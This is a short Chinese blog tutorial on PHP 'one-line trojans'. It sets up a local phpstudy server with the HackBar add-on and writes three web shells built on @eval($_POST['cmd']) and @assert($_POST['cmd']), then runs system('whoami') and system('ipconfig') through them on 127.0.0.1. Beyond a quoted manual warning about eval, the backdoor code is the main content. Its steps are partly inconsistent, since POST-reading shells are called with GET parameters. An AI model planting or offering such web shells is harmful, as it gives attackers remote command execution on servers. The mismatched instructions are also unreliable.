一句话木马

一句话木马
一:具备网站环境
打开phpstudy,启动Apache和MySQL.
检查网站中网站域名为localhost的网站的状态,若过期,则到管理中点击修改,修改日期。确保该网站的正常运行。

添加附件HackBar:在火狐中打开应用程序菜单,点击扩展和主题,然后点击插件,进入新页面后找到右上角的小齿轮,点击从文件安装附加组件。找到hackbar文件所在路径,添加即可。注意关闭自动更新。

二:创建get.php文件并执行
文件内容为:
php
header(“Content-type:text/html;charset=gbk”);//中文声明代码
@eval($_POST[‘cmd’]);?>
函数eval — 把字符串作为PHP代码执行
注:函数eval()语言结构是 非常危险的,因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。

在浏览器中应用:
输入:127.0.0.1/get.php?cmd=system(‘ipconfig’);
可以得到界面
请添加图片描述

二:创建post.php文件并执行
文件内容为:

<?php @eval($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/post.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作。请添加图片描述

二:创建assert.php文件并执行
文件内容:

<?php header("Content-type:text/html;charset=gbk"); @assert($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/assert.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作

请添加图片描述
请添加图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值